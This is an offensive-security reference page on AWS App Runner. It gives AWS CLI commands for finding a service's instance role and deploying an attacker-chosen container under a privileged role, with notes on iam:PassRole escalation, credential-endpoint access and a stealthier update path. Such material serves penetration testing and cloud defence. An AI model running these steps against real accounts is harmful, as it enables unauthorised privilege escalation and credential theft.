App Runner is a managed container-and-web-app runtime. A service runs with an instance role (the role your application code assumes) and optionally an access role for pulling from ECR. Creating or updating a service with your image or source runs your code with that instance role, and deploying from a connected source repository is a supply-chain path.
Deploying your code#
aws apprunner list-services
aws apprunner describe-service --service-arn <arn> \
--query 'Service.InstanceConfiguration.InstanceRoleArn'
# Point a service at your image to run code under its instance role
aws apprunner create-service --service-name x \
--source-configuration 'ImageRepository={ImageIdentifier=<acct>.dkr.ecr.<region>.amazonaws.com/you:latest,ImageRepositoryType=ECR}' \
--instance-configuration 'InstanceRoleArn=<privileged-role>'
Exploitation notes#
- Creating a service with a chosen instance role needs
iam:PassRole, so it is also an identity privilege-escalation path. - The running container reads its role from the App Runner credential endpoint, the same pattern as ECS task roles in containers.
- Updating an existing service to your image is quieter than creating a new one and inherits the existing role.
Tools#
- AWS CLI (
apprunner create-service,update-service,describe-service).